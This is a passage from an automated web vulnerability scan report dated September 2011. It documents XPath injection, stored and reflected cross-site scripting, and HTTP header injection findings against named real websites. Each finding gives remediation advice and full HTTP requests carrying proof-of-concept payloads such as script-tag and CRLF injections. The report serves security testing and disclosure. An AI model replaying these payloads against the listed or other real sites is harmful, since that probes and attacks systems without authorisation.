=phmpg01%3APHMPG02%3APHMPG03%3APHMPG04%3APHMPG05&v7=6&c11=PCR&c12=true&v12=%3A%3Atks3%3Atkt1%3A%3Atmm2%3A%3Atpp3%3Atrm1%3Attb4%3Atpf1%3A%3Atbc3%3Athp1%3A%3A%3A%3Axta1%3A&c13=false&c14=true&v22=5%3A30PM&v23=Saturday&c28=2c8b00cf-c75e-4f55-839f-5b4055db896f&v31=-1&c35=CUS&v35=empty%20code&c37=v.1.0.5&v39=tms1%3Atvc2%3A%3A%3A%3A%3Atxb1%3Atxc2%3A%3A%3A%3A%3A%3Atnp1%3A%3A%3A%3Axtc1%3A&v49=%3A%3A%3A%3A%3A%3Atrf1%3A%3A%3Anta2%3Antb2%3Antc1%3Antd1%3Ante1%3A%3A%3A%3Axtb1%3A&v50=PCR%3AUSA&v51=D%3Dv5&v52=PCR&c53=D%3Dv53&v53=homepage003&c54=D%3Dv54&v54=pcr_8-29-11-bir-rowc&c55=D%3Dv55&v55=PCR%3AHome%3Ahomepage%3A8-29_clear-bir-rowc&c59=D%3Dv59&v59=pcr_hallowee_8-29-11&c60=D%3Dv60&v60=PCR%3AHome%3Aother%3Apcr_halloween_nav&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1233&bh=1037&AQE=1 HTTP/1.1
Host: wa.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&Keyword=PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html&Network=Casale_Media
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731657085158532-6000017500001E87[CE]

Response 2

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 01:17:43 GMT
Server: Omniture DC/2.0.0
xserver: www619
Content-Length: 0
Content-Type: text/html

2. XPath injection previous next
There are 2 instances of this issue:

/communities/campusrivalry/topics [REST URL parameter 2]
/communities/campusrivalry/topics [REST URL parameter 3]

Issue background

XPath injection vulnerabilities arise when user-controllable data is incorporated into XPath queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Depending on the purpose for which the vulnerable query is being used, an attacker may be able to exploit an XPath injection flaw to read sensitive application data or interfere with application logic.

Issue remediation

User input should be strictly validated before being incorporated into XPath queries. In most cases, it will be appropriate to accept input containing only short alhanumeric strings. At the very least, input containing any XPath metacharacters such as " ' / @ = * [ ] ( and ) should be rejected.

2.1. http://content.usatoday.com/communities/campusrivalry/topics [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://content.usatoday.com
Path:	/communities/campusrivalry/topics

Issue detail

The REST URL parameter 2 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 2, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Request

GET /communities/campusrivalry'/topics HTTP/1.1
Host: content.usatoday.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowserSniffer=navigator.type%3D4%3B%0Anavigator.version%3D535.1%3B%0Anavigator.os%3D%22undefined%22%3B%0Anavigator.jsVersion%3D1.6%3B%0Anavigator.vbScriptEnabled%3Dfalse%3B%0A; s_cc=true; s_lastvisit=1315096975071; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; rsi_seg=; rsi_segs=J06575_10396; anonId=95a33e61-cab8-41e8-8a05-66c2a9a0ee5a; ASPSESSIONIDASQTAAAC=EPNJMMPAKJOIAFKDGAKKCMKG; USATINFO=Handle%3D; SiteLifeHost=gnvm3l3pluckcom; s_ppv=11; __qca=P0-1950655009-1315096993908; s_pv=usat%20%3A%2Fcommunities%2Fcampusrivalry%2Fpost%2F2011%2F09%2Flive-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state%2F1; s_sq=usatodayprod%2Cgntbcstglobal%3D%2526pid%253Dusat%252520%25253A%25252Fcommunities%25252Fcampusrivalry%25252Fpost%25252F2011%25252F09%25252Flive-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state%25252F1%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fcontent.usatoday.com%25252Fcommunities%25252Fcampusrivalry%25252Ftopics_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Date: Sun, 04 Sep 2011 00:48:36 GMT
Content-Length: 2862

<b>This is an unclosed string.</b><br/> at MS.Internal.Xml.XPath.XPathScanner.ScanString()<br/> at MS.Internal.Xml.XPath.XPathScanner.NextLex()<br/> at MS.Internal.Xml.XPath.XPathParser.ParsePri
...[SNIP]...
<br/> at System.Xml.XPath.XPathExpression.Compile(String xpath, IXmlNamespaceResolver nsResolver)<br/>
...[SNIP]...

2.2. http://content.usatoday.com/communities/campusrivalry/topics [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://content.usatoday.com
Path:	/communities/campusrivalry/topics

Issue detail

The REST URL parameter 3 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 3, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Request

GET /communities/campusrivalry/topics' HTTP/1.1
Host: content.usatoday.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowserSniffer=navigator.type%3D4%3B%0Anavigator.version%3D535.1%3B%0Anavigator.os%3D%22undefined%22%3B%0Anavigator.jsVersion%3D1.6%3B%0Anavigator.vbScriptEnabled%3Dfalse%3B%0A; s_cc=true; s_lastvisit=1315096975071; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; rsi_seg=; rsi_segs=J06575_10396; anonId=95a33e61-cab8-41e8-8a05-66c2a9a0ee5a; ASPSESSIONIDASQTAAAC=EPNJMMPAKJOIAFKDGAKKCMKG; USATINFO=Handle%3D; SiteLifeHost=gnvm3l3pluckcom; s_ppv=11; __qca=P0-1950655009-1315096993908; s_pv=usat%20%3A%2Fcommunities%2Fcampusrivalry%2Fpost%2F2011%2F09%2Flive-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state%2F1; s_sq=usatodayprod%2Cgntbcstglobal%3D%2526pid%253Dusat%252520%25253A%25252Fcommunities%25252Fcampusrivalry%25252Fpost%25252F2011%25252F09%25252Flive-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state%25252F1%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fcontent.usatoday.com%25252Fcommunities%25252Fcampusrivalry%25252Ftopics_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Date: Sun, 04 Sep 2011 00:48:37 GMT
Content-Length: 2862

<b>This is an unclosed string.</b><br/> at MS.Internal.Xml.XPath.XPathScanner.ScanString()<br/> at MS.Internal.Xml.XPath.XPathScanner.NextLex()<br/> at MS.Internal.Xml.XPath.XPathParser.ParsePri
...[SNIP]...
<br/> at System.Xml.XPath.XPathExpression.Compile(String xpath, IXmlNamespaceResolver nsResolver)<br/>
...[SNIP]...

3. Cross-site scripting (stored) previous next
There are 2 instances of this issue:

http://rma-api.gravity.com/v1/beacons/initialize [vaguid cookie]
http://snas.nbcuni.com/snas/api/getRemoteDomainCookies [JSESSIONID cookie]

Issue background

Stored cross-site scripting vulnerabilities arise when data which originated from any tainted source is copied into the application's responses in an unsafe way. An attacker can use the vulnerability to inject malicious JavaScript code into the application, which will execute within the browser of any user who views the relevant application content.

The attacker-supplied code can perform a wide variety of actions, such as stealing victims' session tokens or login credentials, performing arbitrary actions on their behalf, and logging their keystrokes.

Methods for introducing malicious content include any function where request parameters or headers are processed and stored by the application, and any out-of-band channel whereby data can be introduced into the application's processing space (for example, email messages sent over SMTP which are ultimately rendered within a web mail application).

Stored cross-site scripting flaws are typically more serious than reflected vulnerabilities because they do not require a separate delivery mechanism in order to reach target users, and they can potentially be exploited to create web application worms which spread exponentially amongst application users.

Note that automated detection of stored cross-site scripting vulnerabilities cannot reliably determine whether attacks that are persisted within the application can be accessed by any other user, only by authenticated users, or only by the attacker themselves. You should review the functionality in which the vulnerability appears to determine whether the application's behaviour can feasibly be used to compromise other application users.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

3.1. http://rma-api.gravity.com/v1/beacons/initialize [vaguid cookie] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://rma-api.gravity.com
Path:	/v1/beacons/initialize

Issue detail

The value of the vaguid cookie submitted to the URL /v1/beacons/initialize is copied into the HTML document as plain text between tags at the URL /v1/beacons/initialize. The payload 4a902<script>alert(1)</script>1bb5b69e467 was submitted in the vaguid cookie. This input was returned unmodified in a subsequent request for the URL /v1/beacons/initialize.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request 1

GET /v1/beacons/initialize?u=undefined&sg=6e1ea1b081dc6743bbe3537728eca43d HTTP/1.1
Host: rma-api.gravity.com
Proxy-Connection: keep-alive
Referer: http://www.scribd.com/embeds/63688924/content?start_page=1&view_mode=list&access_key=key-2mw49i3od1t7hxagubzd
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vaguid=172d38ad2d9b9b5aa42030c637b398394a902<script>alert(1)</script>1bb5b69e467

Request 2

Response 2

HTTP/1.1 200 OK
Server: ""
P3P: CP="NOI DSP COR ADMa OUR NOR"
Content-Type: text/javascript;charset=UTF-8
Content-Length: 111
Date: Sun, 04 Sep 2011 01:01:00 GMT
Connection: close
Set-Cookie: vaguid=172d38ad2d9b9b5aa42030c637b398394a902<script>alert(1)</script>1bb5b69e467; Domain=.gravity.com; Expires=Sat, 05-May-2063 02:02:00 GMT; Path=/

GravityInsights.cc('grvinsights', '172d38ad2d9b9b5aa42030c637b398394a902<script>alert(1)</script>1bb5b69e467');

3.2. http://snas.nbcuni.com/snas/api/getRemoteDomainCookies [JSESSIONID cookie] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://snas.nbcuni.com
Path:	/snas/api/getRemoteDomainCookies

Issue detail

The value of the JSESSIONID cookie submitted to the URL /snas/api/getRemoteDomainCookies is copied into the HTML document as plain text between tags at the URL /snas/api/getRemoteDomainCookies. The payload a8502<script>alert(1)</script>e55be4f7c60 was submitted in the JSESSIONID cookie. This input was returned unmodified in a subsequent request for the URL /snas/api/getRemoteDomainCookies.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request 1

GET /snas/api/getRemoteDomainCookies?callback=__nbcsnasadops.doSCallback HTTP/1.1
Host: snas.nbcuni.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D20110904
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=C58B4400F3879E26517C8A2E3ECF06E2a8502<script>alert(1)</script>e55be4f7c60

Request 2

Response 2

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:53:42 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8b DAV/2 mod_jk/1.2.30
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Set-Cookie: JSESSIONID=C58B4400F3879E26517C8A2E3ECF06E2a8502<script>alert(1)</script>e55be4f7c60; Path=/
Cache-Control: max-age=10
Expires: Sun, 04 Sep 2011 00:53:52 GMT
Content-Length: 131
Content-Type: text/html

__nbcsnasadops.doSCallback({ "cookie":{"JSESSIONID":"C58B4400F3879E26517C8A2E3ECF06E2a8502<script>alert(1)</script>e55be4f7c60"}});

4. HTTP header injection previous next
There are 3 instances of this issue:

http://m.xp1.ru4.com/activity [redirect parameter]
http://tacoda.at.atwola.com/rtx/r.js [N cookie]
http://tacoda.at.atwola.com/rtx/r.js [si parameter]

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.

4.1. http://m.xp1.ru4.com/activity [redirect parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://m.xp1.ru4.com
Path:	/activity

Issue detail

The value of the redirect request parameter is copied into the Location response header. The payload f90fe%0d%0a7e63346a2ba was submitted in the redirect parameter. This caused a response containing an injected HTTP header.

Request

GET /activity?_o=62795&_t=cm_admeld&redirect=http%3A%2F%2Ftag.admeld.com%2Fmatch%3F%26admeld_adprovider_id=303%26external_user_id=%7euk%7ef90fe%0d%0a7e63346a2ba&admeld_user_id=14c82149-9fc3-4277-af4b-df6e89b3fc47&admeld_adprovider_id=303&admeld_call_type=redirect&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: m.xp1.ru4.com
Proxy-Connection: keep-alive
Referer: http://blogs.sacbee.com/the_state_worker/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved Temporarily
Server: Sun-Java-System-Web-Server/7.0
Date: Sun, 04 Sep 2011 00:56:34 GMT
P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI"
Pragma: no-cache
Location: http://tag.admeld.com/match?&admeld_adprovider_id=303&external_user_id=BO-00000000670935830f90fe
7e63346a2ba&admeld_user_id=14c82149-9fc3-4277-af4b-df6e89b3fc47&admeld_adprovider_id=303&admeld_call_type=redirect&admeld_callback=http://tag.admeld.com/match
Content-length: 0
X-Cnection: close

4.2. http://tacoda.at.atwola.com/rtx/r.js [N cookie] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://tacoda.at.atwola.com
Path:	/rtx/r.js

Issue detail

The value of the N cookie is copied into the Set-Cookie response header. The payload 5acac%0d%0a221f811ccdb was submitted in the N cookie. This caused a response containing an injected HTTP header.

Request

GET /rtx/r.js?cmd=LCN&si=11684&pi=-&xs=3&pu=http%253A//blogs.sacbee.com/the_state_worker/%2523navlink%253Dnavdrop%253Fifu%253Dhttp%25253A//www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html&df=1&v=6.0&cb=78634 HTTP/1.1
Host: tacoda.at.atwola.com
Proxy-Connection: keep-alive
Referer: http://blogs.sacbee.com/the_state_worker/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATTACID=a3Z0aWQ9MTc2NWlmdTFha2tjNzk=; ANRTT=; Tsid=0^1315097086^1315098886|17778^1315097086^1315098886; TData=99999|^; N=2:b2269f69029173967deb3f16e3a72f925acac%0d%0a221f811ccdb; ATTAC=a3ZzZWc9OTk5OTk6; eadx=x

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:07:33 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Cache-Control: max-age=900
Expires: Sun, 04 Sep 2011 01:22:33 GMT
Set-Cookie: ATTACID=a3Z0aWQ9MTc2NWlmdTFha2tjNzk=; path=/; expires=Wed, 29-Aug-12 01:07:33 GMT; domain=.at.atwola.com
Set-Cookie: ANRTT=; path=/; expires=Sun, 11-Sep-11 01:07:33 GMT; domain=tacoda.at.atwola.com
Set-Cookie: Tsid=0^1315097086^1315100253|17778^1315097086^1315098886|11684^1315098448^1315100253; path=/; expires=Sun, 04-Sep-11 01:37:33 GMT; domain=tacoda.at.atwola.com
Set-Cookie: TData=99999|^; expires=Wed, 29-Aug-12 01:07:33 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: N=2:b2269f69029173967deb3f16e3a72f925acac
221f811ccdb,b2269f69029173967deb3f16e3a72f92; expires=Wed, 29-Aug-12 01:07:33 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: ATTAC=a3ZzZWc9OTk5OTk6; expires=Wed, 29-Aug-12 01:07:33 GMT; path=/; domain=.at.atwola.com
ntCoent-Length: 102
Content-Type: application/x-javascript
Content-Length: 102

var ANUT=1;
var ANOO=0;
var ANSR=1;
var ANTID='1765ifu1akkc79';
var ANSL='99999|^';
ANRTXR();

4.3. http://tacoda.at.atwola.com/rtx/r.js [si parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://tacoda.at.atwola.com
Path:	/rtx/r.js

Issue detail

The value of the si request parameter is copied into the Set-Cookie response header. The payload fa8dd%0d%0afea8607b62f was submitted in the si parameter. This caused a response containing an injected HTTP header.

Request

GET /rtx/r.js?cmd=LCN&si=fa8dd%0d%0afea8607b62f&pi=-&xs=3&pu=http%253A//blogs.sacbee.com/the_state_worker/%2523navlink%253Dnavdrop%253Fifu%253Dhttp%25253A//www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html&df=1&v=6.0&cb=78634 HTTP/1.1
Host: tacoda.at.atwola.com
Proxy-Connection: keep-alive
Referer: http://blogs.sacbee.com/the_state_worker/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATTACID=a3Z0aWQ9MTc2NWlmdTFha2tjNzk=; ANRTT=; Tsid=0^1315097086^1315098886|17778^1315097086^1315098886; TData=99999|^; N=2:b2269f69029173967deb3f16e3a72f92; ATTAC=a3ZzZWc9OTk5OTk6; eadx=x

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:06:35 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Cache-Control: max-age=900
Expires: Sun, 04 Sep 2011 01:21:35 GMT
Set-Cookie: ATTACID=a3Z0aWQ9MTc2NWlmdTFha2tjNzk=; path=/; expires=Wed, 29-Aug-12 01:06:35 GMT; domain=.at.atwola.com
Set-Cookie: ANRTT=; path=/; expires=Sun, 11-Sep-11 01:06:35 GMT; domain=tacoda.at.atwola.com
Set-Cookie: Tsid=0^1315097086^1315100195|17778^1315097086^1315098886|11684^1315098364^1315100193|fa8dd
fea8607b62f^1315098395^1315100195; path=/; expires=Sun, 04-Sep-11 01:36:35 GMT; domain=tacoda.at.atwola.com
Set-Cookie: TData=99999|^; expires=Wed, 29-Aug-12 01:06:35 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: N=2:b2269f69029173967deb3f16e3a72f92,b2269f69029173967deb3f16e3a72f92; expires=Wed, 29-Aug-12 01:06:35 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: ATTAC=a3ZzZWc9OTk5OTk6; expires=Wed, 29-Aug-12 01:06:35 GMT; path=/; domain=.at.atwola.com
Cteonnt-Length: 102
Content-Type: application/x-javascript
Content-Length: 102

var ANUT=1;
var ANOO=0;
var ANSR=1;
var ANTID='1765ifu1akkc79';
var ANSL='99999|^';
ANRTXR();

5. Cross-site scripting (reflected) previous next
There are 105 instances of this issue:

http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0026084b [REST URL parameter 9]
http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0054242b [REST URL parameter 9]
http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0057916b [REST URL parameter 9]
http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0071881 [REST URL parameter 9]
http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0073727b [REST URL parameter 9]
http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0090481b [REST URL parameter 9]
http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0105447b [REST URL parameter 9]
http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0105684b [REST URL parameter 9]
http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0106998b [REST URL parameter 9]
http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000001016X_35172_W1 [REST URL parameter 9]
http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_000000076432_66228_W1_SQ [REST URL parameter 9]
http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000007G437_68702_W1_SQ [REST URL parameter 9]
http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000007H355_69865_W2_SQ [REST URL parameter 9]
http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000008H201_82170_W2_SQ [REST URL parameter 9]
http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000008H203_82172_W1_SQ [REST URL parameter 9]
http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000010D01X_103184_W1 [REST URL parameter 9]
http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_0000008G370X_85066_W7_SQ [REST URL parameter 9]
http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_0000009A230X_85266_W1_SQ [REST URL parameter 9]
http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_000000011F48_0138343_W1_SQ [REST URL parameter 9]
http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_00000002352X_0049859_W1_SQ [REST URL parameter 9]
http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_00000011A98X_114727_W1 [REST URL parameter 9]
http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_0000009G125X_0090481_W2_SQ [REST URL parameter 9]
http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_0000011F111X_0138942_W1_SQ [REST URL parameter 9]
http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_0000011G128X_0134102_W1_SQ [REST URL parameter 9]
http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_0000011G242X_0136242_W1_SQ [REST URL parameter 9]
http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/p0084749b [REST URL parameter 9]
http://ads.adbrite.com/adserver/vdi/742697 [REST URL parameter 3]
http://api.bit.ly/shorten [callback parameter]
http://api.bit.ly/shorten [longUrl parameter]
http://api.echoenabled.com/v1/search [q parameter]
http://b.scorecardresearch.com/beacon.js [c1 parameter]
http://b.scorecardresearch.com/beacon.js [c15 parameter]
http://b.scorecardresearch.com/beacon.js [c2 parameter]
http://b.scorecardresearch.com/beacon.js [c3 parameter]
http://b.scorecardresearch.com/beacon.js [c4 parameter]
http://b.scorecardresearch.com/beacon.js [c5 parameter]
http://b.scorecardresearch.com/beacon.js [c6 parameter]
http://cm.npc-mcclatchy.overture.com/js_1_0/ [css_url parameter]
http://community.sprint.com/baw/community/buzzaboutwireless/customer-service/sprintdotcom-support [REST URL parameter 3]
http://community.sprint.com/baw/community/buzzaboutwireless/customer-service/sprintdotcom-support [REST URL parameter 3]
http://community.sprint.com/baw/community/buzzaboutwireless/customer-service/sprintdotcom-support [REST URL parameter 4]
http://community.sprint.com/baw/community/buzzaboutwireless/customer-service/sprintdotcom-support [REST URL parameter 4]
http://community.sprint.com/baw/community/buzzaboutwireless/general/suggestions-for-sprint [REST URL parameter 3]
http://community.sprint.com/baw/community/buzzaboutwireless/general/suggestions-for-sprint [REST URL parameter 3]
http://community.sprint.com/baw/community/buzzaboutwireless/general/suggestions-for-sprint [REST URL parameter 4]
http://community.sprint.com/baw/community/buzzaboutwireless/general/suggestions-for-sprint [REST URL parameter 4]
http://community.sprint.com/baw/community/sprintblogs/buzz-by-sprint/sprint-video [REST URL parameter 3]
http://community.sprint.com/baw/community/sprintblogs/buzz-by-sprint/sprint-video [REST URL parameter 3]
http://community.sprint.com/baw/community/sprintblogs/buzz-by-sprint/sprint-video [REST URL parameter 4]
http://community.sprint.com/baw/community/sprintblogs/buzz-by-sprint/sprint-video [REST URL parameter 4]
http://img.mediaplex.com/content/0/10105/PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp.js [mpck parameter]
